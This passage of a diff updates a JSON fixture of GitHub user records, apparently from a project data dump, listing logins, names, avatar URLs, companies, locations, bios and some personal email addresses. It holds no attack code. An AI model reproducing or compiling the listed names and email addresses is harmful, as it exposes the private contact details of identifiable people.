"updated_at": "2024-05-28T19:35:10Z", + "node_id": "MDQ6VXNlcjU5MzMxMzc=", + "bio": "", "is_hireable": false, - "twitter_username": "quentingosset" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2645, + "pk": 8001, "fields": { - "nest_created_at": "2024-09-12T01:37:38.281Z", - "nest_updated_at": "2024-09-12T01:37:38.281Z", - "name": "Mikael Carneholm", - "login": "mikael-carneholm-2-wcar", + "nest_created_at": "2024-09-22T09:39:16.688Z", + "nest_updated_at": "2024-09-22T19:38:18.911Z", + "name": "", + "login": "rbutturini", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60105757?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/83508218?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -426368,9 +685942,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2020-01-20T15:27:30Z", - "updated_at": "2024-03-13T09:23:23Z", - "node_id": "MDQ6VXNlcjYwMTA1NzU3", + "created_at": "2021-05-01T15:47:25Z", + "updated_at": "2024-01-30T01:36:09Z", + "node_id": "MDQ6VXNlcjgzNTA4MjE4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426378,99 +685952,74 @@ }, { "model": "github.user", - "pk": 2646, + "pk": 8002, "fields": { - "nest_created_at": "2024-09-12T01:37:40.766Z", - "nest_updated_at": "2024-09-12T01:37:40.766Z", - "name": "Robert Blackman", - "login": "robert-blackman", - "email": "robert.blackman@monster.com", - "avatar_url": "https://avatars.githubusercontent.com/u/57333677?v=4", + "nest_created_at": "2024-09-22T09:39:17.650Z", + "nest_updated_at": "2024-09-22T19:38:19.889Z", + "name": "Muhammad Jamshaid Iqbal", + "login": "jamshaid120", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30922803?v=4", "company": "", - "location": "", + "location": "Sahiwal, Punjab, Pakistan", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 3, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2019-11-04T00:00:08Z", - "updated_at": "2024-01-07T22:42:03Z", - "node_id": "MDQ6VXNlcjU3MzMzNjc3", - "bio": "", - "is_hireable": false, + "public_repositories_count": 25, + "created_at": "2017-08-11T07:35:35Z", + "updated_at": "2024-09-13T13:57:34Z", + "node_id": "MDQ6VXNlcjMwOTIyODAz", + "bio": "A passionate person who love to code and is always willing to learn new things while spreading the knowledge by sharing with others. \r\n:) ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2647, + "pk": 8003, "fields": { - "nest_created_at": "2024-09-12T01:37:45.497Z", - "nest_updated_at": "2024-09-12T01:37:45.497Z", - "name": "", - "login": "rozeru1125", + "nest_created_at": "2024-09-22T09:39:17.961Z", + "nest_updated_at": "2024-09-22T19:38:20.199Z", + "name": "M@!@", + "login": "mhalt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/147065307?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18124608?v=4", "company": "", - "location": "", + "location": "Montreal, Quebec, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 19, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-10-05T12:56:48Z", - "updated_at": "2024-03-20T17:52:22Z", - "node_id": "U_kgDOCMQJ2w", - "bio": "", - "is_hireable": false, + "public_repositories_count": 21, + "created_at": "2016-03-28T19:08:02Z", + "updated_at": "2024-07-09T12:18:10Z", + "node_id": "MDQ6VXNlcjE4MTI0NjA4", + "bio": "Always learning and leveling up. ", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2648, - "fields": { - "nest_created_at": "2024-09-12T01:37:48.369Z", - "nest_updated_at": "2024-09-12T01:37:48.369Z", - "name": "Jonathan Mezach", - "login": "jmezach", - "email": "jonathan.mezach@rr-wfm.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1225489?v=4", - "company": "@rr-wfm", - "location": "Netherlands", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 43, - "public_gists_count": 5, - "public_repositories_count": 68, - "created_at": "2011-11-28T14:34:21Z", - "updated_at": "2024-09-07T07:03:50Z", - "node_id": "MDQ6VXNlcjEyMjU0ODk=", - "bio": "Solution Architect at R&R WFM in Veenendaal, The Netherlands. Passionate about .NET and helping development teams achieve more by improving their experience.", - "is_hireable": false, - "twitter_username": "jmezach" - } -}, -{ - "model": "github.user", - "pk": 2649, + "pk": 8004, "fields": { - "nest_created_at": "2024-09-12T01:37:50.014Z", - "nest_updated_at": "2024-09-12T01:37:50.015Z", - "name": "João Mauricio", - "login": "jmoalves", - "email": "jmoalves.dev@pobox.com", - "avatar_url": "https://avatars.githubusercontent.com/u/15057966?v=4", - "company": "", - "location": "Brazil", + "nest_created_at": "2024-09-22T09:39:20.570Z", + "nest_updated_at": "2024-09-22T19:38:22.772Z", + "name": "Grant Walker", + "login": "gvwalker", + "email": "grant.v.walker@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/550004?v=4", + "company": "Sanlam", + "location": "Cape Town, South Africa", "collaborators_count": 0, - "following_count": 4, - "followers_count": 7, + "following_count": 9, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2015-10-10T00:29:30Z", - "updated_at": "2024-08-22T00:33:04Z", - "node_id": "MDQ6VXNlcjE1MDU3OTY2", + "public_repositories_count": 7, + "created_at": "2011-01-06T08:46:13Z", + "updated_at": "2024-09-12T10:05:41Z", + "node_id": "MDQ6VXNlcjU1MDAwNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426478,24 +686027,24 @@ }, { "model": "github.user", - "pk": 2650, + "pk": 8005, "fields": { - "nest_created_at": "2024-09-12T01:37:51.294Z", - "nest_updated_at": "2024-09-12T02:09:52.646Z", + "nest_created_at": "2024-09-22T09:39:25.711Z", + "nest_updated_at": "2024-09-22T19:38:27.900Z", "name": "", - "login": "SaberStrat", + "login": "CarsonDillenbeck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11158273?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29692111?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-02-23T11:09:36Z", - "updated_at": "2024-09-01T16:19:20Z", - "node_id": "MDQ6VXNlcjExMTU4Mjcz", + "public_repositories_count": 2, + "created_at": "2017-06-25T16:53:34Z", + "updated_at": "2024-08-18T21:53:01Z", + "node_id": "MDQ6VXNlcjI5NjkyMTEx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426503,49 +686052,49 @@ }, { "model": "github.user", - "pk": 2651, + "pk": 8006, "fields": { - "nest_created_at": "2024-09-12T01:37:52.529Z", - "nest_updated_at": "2024-09-16T22:28:58.155Z", - "name": "", - "login": "Tobsensgit", + "nest_created_at": "2024-09-22T09:39:26.362Z", + "nest_updated_at": "2024-09-22T19:38:28.541Z", + "name": "Jino Tesauro", + "login": "Jino-T", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47250264?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53376807?v=4", + "company": "@10Security", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-02-01T14:53:21Z", - "updated_at": "2024-04-03T13:39:49Z", - "node_id": "MDQ6VXNlcjQ3MjUwMjY0", - "bio": "", + "public_repositories_count": 5, + "created_at": "2019-07-27T16:13:58Z", + "updated_at": "2024-09-21T07:19:52Z", + "node_id": "MDQ6VXNlcjUzMzc2ODA3", + "bio": "Trinity University 2026", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2652, + "pk": 8007, "fields": { - "nest_created_at": "2024-09-12T01:37:54.201Z", - "nest_updated_at": "2024-09-12T01:37:54.201Z", - "name": "", - "login": "WantDead", + "nest_created_at": "2024-09-22T09:39:30.239Z", + "nest_updated_at": "2024-09-22T19:38:32.479Z", + "name": "Aniket Bhat", + "login": "AniketBhat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77077842?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/64396289?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-01-06T21:04:39Z", - "updated_at": "2024-09-03T22:16:15Z", - "node_id": "MDQ6VXNlcjc3MDc3ODQy", + "public_repositories_count": 0, + "created_at": "2020-04-27T05:43:06Z", + "updated_at": "2021-07-24T10:51:47Z", + "node_id": "MDQ6VXNlcjY0Mzk2Mjg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426553,49 +686102,49 @@ }, { "model": "github.user", - "pk": 2653, + "pk": 8008, "fields": { - "nest_created_at": "2024-09-12T01:37:57.945Z", - "nest_updated_at": "2024-09-12T01:37:57.945Z", - "name": "Brett Delle Grazie", - "login": "bdellegrazie", + "nest_created_at": "2024-09-22T09:39:30.870Z", + "nest_updated_at": "2024-09-22T19:38:33.107Z", + "name": "Anant Verma", + "login": "abstrxtInfinity", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/973480?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55052738?v=4", "company": "", - "location": "", + "location": "Lucknow, India", "collaborators_count": 0, - "following_count": 2, - "followers_count": 22, - "public_gists_count": 1, - "public_repositories_count": 94, - "created_at": "2011-08-11T09:17:24Z", - "updated_at": "2024-09-04T11:20:21Z", - "node_id": "MDQ6VXNlcjk3MzQ4MA==", - "bio": "", + "following_count": 112, + "followers_count": 85, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2019-09-08T12:41:24Z", + "updated_at": "2024-09-21T11:59:26Z", + "node_id": "MDQ6VXNlcjU1MDUyNzM4", + "bio": "National Institute of Technology, Hamirpur || Master's || CSE ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2654, + "pk": 8009, "fields": { - "nest_created_at": "2024-09-12T01:38:04.318Z", - "nest_updated_at": "2024-09-12T01:38:04.318Z", - "name": "Massimo Prencipe", - "login": "masse-solita", + "nest_created_at": "2024-09-22T09:39:31.182Z", + "nest_updated_at": "2024-09-22T19:38:33.420Z", + "name": "", + "login": "AniketBhat1072", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54018836?v=4", - "company": "Solita", + "avatar_url": "https://avatars.githubusercontent.com/u/143893114?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-08-12T07:08:31Z", - "updated_at": "2024-07-22T05:47:24Z", - "node_id": "MDQ6VXNlcjU0MDE4ODM2", + "public_repositories_count": 5, + "created_at": "2023-09-02T15:27:26Z", + "updated_at": "2024-03-03T09:13:18Z", + "node_id": "U_kgDOCJOieg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426603,89 +686152,89 @@ }, { "model": "github.user", - "pk": 2655, + "pk": 8010, "fields": { - "nest_created_at": "2024-09-12T01:38:06.860Z", - "nest_updated_at": "2024-09-12T01:38:06.860Z", - "name": "Margus Anvelt", - "login": "margusanvelt", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15866756?v=4", + "nest_created_at": "2024-09-22T09:39:42.251Z", + "nest_updated_at": "2024-09-22T19:38:44.229Z", + "name": "Jason Khoo", + "login": "jasonkhooch-github", + "email": "jason.khoo@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/30399031?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, + "followers_count": 7, + "public_gists_count": 0, "public_repositories_count": 11, - "created_at": "2015-11-16T07:22:51Z", - "updated_at": "2024-04-18T13:27:05Z", - "node_id": "MDQ6VXNlcjE1ODY2NzU2", + "created_at": "2017-07-24T04:14:27Z", + "updated_at": "2024-09-18T01:15:01Z", + "node_id": "MDQ6VXNlcjMwMzk5MDMx", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jasonkhooch" } }, { "model": "github.user", - "pk": 2656, + "pk": 8011, "fields": { - "nest_created_at": "2024-09-12T01:38:10.633Z", - "nest_updated_at": "2024-09-12T01:38:10.633Z", - "name": "Jason Reed", - "login": "jreed-cartago", - "email": "j.reed@cartago.com", - "avatar_url": "https://avatars.githubusercontent.com/u/72963764?v=4", - "company": "Cartago Software GmbH", - "location": "Landshut Germany", + "nest_created_at": "2024-09-22T09:39:42.591Z", + "nest_updated_at": "2024-09-22T19:38:44.543Z", + "name": "Andrew McCoy", + "login": "Moose0621", + "email": "moose0621@github.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1953957?v=4", + "company": "GitHub", + "location": "CT", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-10-16T06:26:39Z", - "updated_at": "2024-06-20T08:44:00Z", - "node_id": "MDQ6VXNlcjcyOTYzNzY0", - "bio": "Java Software Developer at Cartago-Software in Landshut Germany,", + "following_count": 4, + "followers_count": 22, + "public_gists_count": 6, + "public_repositories_count": 101, + "created_at": "2012-07-11T03:38:56Z", + "updated_at": "2024-09-03T15:00:05Z", + "node_id": "MDQ6VXNlcjE5NTM5NTc=", + "bio": "GitHub Advanced Security Field Architect", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2657, + "pk": 8012, "fields": { - "nest_created_at": "2024-09-12T01:38:11.911Z", - "nest_updated_at": "2024-09-12T01:38:11.911Z", - "name": "Akshay kumar", - "login": "akshayd3v", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/118272033?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:39:42.899Z", + "nest_updated_at": "2024-09-22T20:29:50.023Z", + "name": "Jie", + "login": "jie-lin", + "email": "jie_lin@hit.edu.cn", + "avatar_url": "https://avatars.githubusercontent.com/u/7286656?v=4", + "company": "Harbin Institute of Technology, Shenzhen", + "location": "Guangdong, China", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-11-15T11:46:10Z", - "updated_at": "2024-09-10T05:39:25Z", - "node_id": "U_kgDOBwywIQ", - "bio": "", + "public_repositories_count": 14, + "created_at": "2014-04-14T06:35:51Z", + "updated_at": "2024-03-22T05:51:27Z", + "node_id": "MDQ6VXNlcjcyODY2NTY=", + "bio": "Computer science", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2658, + "pk": 8013, "fields": { - "nest_created_at": "2024-09-12T01:38:17.356Z", - "nest_updated_at": "2024-09-12T01:38:17.356Z", + "nest_created_at": "2024-09-22T09:39:43.218Z", + "nest_updated_at": "2024-09-22T19:38:45.159Z", "name": "", - "login": "fengliu012", + "login": "ganntest", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/134475245?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35301705?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -426693,9 +686242,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2023-05-24T05:30:21Z", - "updated_at": "2023-05-24T05:30:21Z", - "node_id": "U_kgDOCAPt7Q", + "created_at": "2018-01-10T14:42:50Z", + "updated_at": "2024-01-03T18:15:18Z", + "node_id": "MDQ6VXNlcjM1MzAxNzA1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426703,24 +686252,24 @@ }, { "model": "github.user", - "pk": 2659, + "pk": 8014, "fields": { - "nest_created_at": "2024-09-12T01:38:20.323Z", - "nest_updated_at": "2024-09-12T01:38:20.323Z", + "nest_created_at": "2024-09-22T09:39:43.874Z", + "nest_updated_at": "2024-09-22T19:38:45.797Z", "name": "", - "login": "starfishfive", + "login": "nbuckwalt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/161029169?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/28162837?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 8, + "followers_count": 2, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2024-02-23T11:26:43Z", - "updated_at": "2024-02-23T11:26:43Z", - "node_id": "U_kgDOCZkcMQ", + "created_at": "2017-04-28T20:16:08Z", + "updated_at": "2024-08-13T21:18:09Z", + "node_id": "MDQ6VXNlcjI4MTYyODM3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426728,24 +686277,24 @@ }, { "model": "github.user", - "pk": 2660, + "pk": 8015, "fields": { - "nest_created_at": "2024-09-12T01:38:21.561Z", - "nest_updated_at": "2024-09-12T01:38:21.561Z", + "nest_created_at": "2024-09-22T09:39:44.824Z", + "nest_updated_at": "2024-09-22T19:39:06.011Z", "name": "", - "login": "markehack", + "login": "zivRhcl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7780449?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/134940932?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2014-06-03T12:16:54Z", - "updated_at": "2024-02-27T15:25:07Z", - "node_id": "MDQ6VXNlcjc3ODA0NDk=", + "public_repositories_count": 2, + "created_at": "2023-05-29T12:50:10Z", + "updated_at": "2024-03-06T08:03:09Z", + "node_id": "U_kgDOCAsJBA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426753,49 +686302,49 @@ }, { "model": "github.user", - "pk": 2661, + "pk": 8016, "fields": { - "nest_created_at": "2024-09-12T01:38:24.105Z", - "nest_updated_at": "2024-09-16T22:29:01.629Z", - "name": "Shakti Singh Rathore", - "login": "ccfahe", + "nest_created_at": "2024-09-22T09:39:45.788Z", + "nest_updated_at": "2024-09-22T19:38:47.685Z", + "name": "", + "login": "evilwan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43042984?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11840077?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2018-09-06T16:26:52Z", - "updated_at": "2024-04-20T16:53:49Z", - "node_id": "MDQ6VXNlcjQzMDQyOTg0", - "bio": "Devops and SRE ,having 7 years of experience in building CICD and implementation devops practices in organisations", + "public_repositories_count": 11, + "created_at": "2015-04-07T17:40:21Z", + "updated_at": "2023-08-15T10:08:22Z", + "node_id": "MDQ6VXNlcjExODQwMDc3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2662, + "pk": 8017, "fields": { - "nest_created_at": "2024-09-12T01:38:25.760Z", - "nest_updated_at": "2024-09-12T01:38:25.760Z", + "nest_created_at": "2024-09-22T09:39:46.419Z", + "nest_updated_at": "2024-09-22T19:38:48.305Z", "name": "", - "login": "sbklahr", + "login": "dragon040", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/119951143?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6553159?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-12-06T14:29:19Z", - "updated_at": "2024-05-21T09:05:46Z", - "node_id": "U_kgDOByZPJw", + "following_count": 15, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 44, + "created_at": "2014-01-31T11:39:40Z", + "updated_at": "2024-05-12T20:20:09Z", + "node_id": "MDQ6VXNlcjY1NTMxNTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426803,24 +686352,24 @@ }, { "model": "github.user", - "pk": 2663, + "pk": 8018, "fields": { - "nest_created_at": "2024-09-12T01:38:31.203Z", - "nest_updated_at": "2024-09-16T22:29:07.191Z", + "nest_created_at": "2024-09-22T09:39:47.041Z", + "nest_updated_at": "2024-09-22T19:38:48.939Z", "name": "", - "login": "mzweem", + "login": "waveburst", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/165893083?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/40212977?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-04-03T09:05:03Z", - "updated_at": "2024-09-11T14:24:34Z", - "node_id": "U_kgDOCeNT2w", + "public_repositories_count": 7, + "created_at": "2018-06-12T17:42:09Z", + "updated_at": "2023-01-21T20:20:00Z", + "node_id": "MDQ6VXNlcjQwMjEyOTc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426828,99 +686377,99 @@ }, { "model": "github.user", - "pk": 2664, + "pk": 8019, "fields": { - "nest_created_at": "2024-09-12T01:38:32.453Z", - "nest_updated_at": "2024-09-12T01:40:40.411Z", - "name": "", - "login": "tapmch", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/132920574?v=4", + "nest_created_at": "2024-09-22T09:39:47.357Z", + "nest_updated_at": "2024-09-22T19:38:49.256Z", + "name": "Marcos Cacabelos Prol", + "login": "mcprol", + "email": "mcprol@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12658060?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-05-08T14:27:08Z", - "updated_at": "2024-09-09T06:26:19Z", - "node_id": "U_kgDOB-w0_g", - "bio": "", + "public_repositories_count": 23, + "created_at": "2015-05-29T10:15:42Z", + "updated_at": "2024-09-15T12:01:35Z", + "node_id": "MDQ6VXNlcjEyNjU4MDYw", + "bio": "electrician at metricool.com", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2665, + "pk": 8020, "fields": { - "nest_created_at": "2024-09-12T01:38:35.762Z", - "nest_updated_at": "2024-09-12T01:38:37.012Z", - "name": "Swapnil Pawar", - "login": "spawar-apex", + "nest_created_at": "2024-09-22T09:39:47.689Z", + "nest_updated_at": "2024-09-22T19:38:49.569Z", + "name": "", + "login": "boskostan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/127979991?v=4", - "company": "Apex Fintech Solutions", - "location": "Chicago", + "avatar_url": "https://avatars.githubusercontent.com/u/29266274?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2023-03-15T17:09:18Z", - "updated_at": "2024-01-10T19:07:53Z", - "node_id": "U_kgDOB6DR1w", - "bio": "Cloud Security Engineer", + "public_repositories_count": 3, + "created_at": "2017-06-08T00:54:00Z", + "updated_at": "2023-09-20T19:19:11Z", + "node_id": "MDQ6VXNlcjI5MjY2Mjc0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2666, + "pk": 8021, "fields": { - "nest_created_at": "2024-09-12T01:38:44.010Z", - "nest_updated_at": "2024-09-12T01:38:44.010Z", - "name": "Aravind Parappil", - "login": "aravindparappil46", - "email": "aravindparappil@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/43161107?v=4", + "nest_created_at": "2024-09-22T09:39:48.024Z", + "nest_updated_at": "2024-09-22T19:38:49.888Z", + "name": "Zoobin Jafari", + "login": "zoobinn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46724600?v=4", "company": "", - "location": "Raleigh, North Carolina", + "location": "", "collaborators_count": 0, - "following_count": 7, + "following_count": 2, "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 39, - "created_at": "2018-09-11T03:31:43Z", - "updated_at": "2024-09-07T15:11:26Z", - "node_id": "MDQ6VXNlcjQzMTYxMTA3", - "bio": "Software Developer. Cloud & AppSec Enthusiast", - "is_hireable": true, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2019-01-15T18:54:41Z", + "updated_at": "2024-07-03T00:00:11Z", + "node_id": "MDQ6VXNlcjQ2NzI0NjAw", + "bio": "Defence in depth, Cloud Architecture, Software & Infrastructure Design, Reliability & Ops", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2667, + "pk": 8022, "fields": { - "nest_created_at": "2024-09-12T01:38:44.849Z", - "nest_updated_at": "2024-09-12T01:38:44.849Z", - "name": "", - "login": "sunilnaidugc", + "nest_created_at": "2024-09-22T09:39:48.356Z", + "nest_updated_at": "2024-09-22T19:38:50.193Z", + "name": "Nuno Oliveira", + "login": "pnpo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107829313?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5421253?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2022-06-20T04:48:14Z", - "updated_at": "2024-06-06T08:29:16Z", - "node_id": "U_kgDOBm1YQQ", + "public_repositories_count": 6, + "created_at": "2013-09-09T19:46:30Z", + "updated_at": "2021-04-01T17:35:54Z", + "node_id": "MDQ6VXNlcjU0MjEyNTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426928,24 +686477,24 @@ }, { "model": "github.user", - "pk": 2668, + "pk": 8023, "fields": { - "nest_created_at": "2024-09-12T01:38:46.501Z", - "nest_updated_at": "2024-09-12T01:38:46.501Z", - "name": "Shubham Bhingarde", - "login": "Shubham-Bhingarde", + "nest_created_at": "2024-09-22T09:39:48.670Z", + "nest_updated_at": "2024-09-22T19:38:50.514Z", + "name": "Luís Ventuzelos", + "login": "LuisVentuzelos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92458532?v=4", - "company": "CDAC Mumbai", - "location": "juhu", + "avatar_url": "https://avatars.githubusercontent.com/u/46198926?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 0, + "following_count": 4, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-10-13T16:10:59Z", - "updated_at": "2023-09-21T11:45:43Z", - "node_id": "U_kgDOBYLOJA", + "public_repositories_count": 14, + "created_at": "2018-12-27T17:05:32Z", + "updated_at": "2024-09-16T11:25:33Z", + "node_id": "MDQ6VXNlcjQ2MTk4OTI2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -426953,49 +686502,49 @@ }, { "model": "github.user", - "pk": 2669, + "pk": 8024, "fields": { - "nest_created_at": "2024-09-12T01:38:47.750Z", - "nest_updated_at": "2024-09-12T01:39:12.612Z", - "name": "", - "login": "andreeaButerchi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16935118?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:39:49.300Z", + "nest_updated_at": "2024-09-22T19:38:51.185Z", + "name": "Fausto Spoto", + "login": "spoto", + "email": "fausto.spoto@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/628113?v=4", + "company": "Università di Verona", + "location": "Verona, Italy", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 83, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-01-28T09:29:23Z", - "updated_at": "2024-08-29T07:56:30Z", - "node_id": "MDQ6VXNlcjE2OTM1MTE4", - "bio": "", + "public_repositories_count": 19, + "created_at": "2011-02-20T09:54:32Z", + "updated_at": "2024-09-09T12:53:31Z", + "node_id": "MDQ6VXNlcjYyODExMw==", + "bio": "University professor of computer science, passionate of software development", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2670, + "pk": 8025, "fields": { - "nest_created_at": "2024-09-12T01:38:49.200Z", - "nest_updated_at": "2024-09-16T22:29:02.655Z", + "nest_created_at": "2024-09-22T09:39:49.975Z", + "nest_updated_at": "2024-09-22T19:38:51.823Z", "name": "", - "login": "mikehall-mozz", + "login": "kishan-k2io", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/172062109?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/59822282?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-06-07T16:04:05Z", - "updated_at": "2024-06-07T16:04:18Z", - "node_id": "U_kgDOCkF1nQ", + "public_repositories_count": 2, + "created_at": "2020-01-13T08:50:00Z", + "updated_at": "2024-04-29T05:37:51Z", + "node_id": "MDQ6VXNlcjU5ODIyMjgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -427003,24 +686552,24 @@ }, { "model": "github.user", - "pk": 2671, + "pk": 8026, "fields": { - "nest_created_at": "2024-09-12T01:38:56.263Z", - "nest_updated_at": "2024-09-12T01:39:05.011Z", - "name": "zim", - "login": "x-zim", + "nest_created_at": "2024-09-22T09:39:50.289Z", + "nest_updated_at": "2024-09-22T19:38:52.140Z", + "name": "", + "login": "jgama", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68728715?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11095943?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2020-07-24T07:24:48Z", - "updated_at": "2024-07-26T06:59:21Z", - "node_id": "MDQ6VXNlcjY4NzI4NzE1", + "public_repositories_count": 2, + "created_at": "2015-02-20T19:53:39Z", + "updated_at": "2023-09-25T18:29:31Z", + "node_id": "MDQ6VXNlcjExMDk1OTQz", "bio": "", 